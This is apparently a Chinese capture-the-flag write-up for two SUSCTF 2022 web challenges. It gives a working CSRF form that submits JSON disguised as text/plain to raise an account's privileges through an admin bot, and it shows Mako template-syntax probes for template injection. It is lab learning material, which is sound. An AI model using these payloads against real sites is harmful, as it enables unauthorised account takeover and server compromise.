2022susctf
fxxkcors
考点:
1.CSRF
有个js附件下载下来,据说其内容是用puppeteer去模拟浏览器登录,然后访问我们给定的链接(原理并不清晰)
在登陆后有个提示
只需要更改权限为normal admin
就能拿到flag,不是admin登陆的不能修改权限
解题思路
构造CSRF,参考浅谈CSRF,然后利用题目提供的Admin report访问进行CSRF权限提升
还需注意要使Content-Type: text/plain,然后body中是json数据,原因是因为服务没有验证 JSON 的 content-type
表单
<form id=a action="http://124.71.205.122:10002/change.php" method="POST" enctype="text/plain">
<input name='{"username":"fweewfwef", "abc":"' value='123"}'>
</form>
<script> a.submit(); </script>
HTML practice
提交##
会使页面为空,后面发现是mako框架
利用mako框架的循环来验证
% for i in l:
${i}
% endfor
% for i in (1,2,3):
2
% endfor
页面渲染了3个2,确定是mako框架,后翻阅文档.....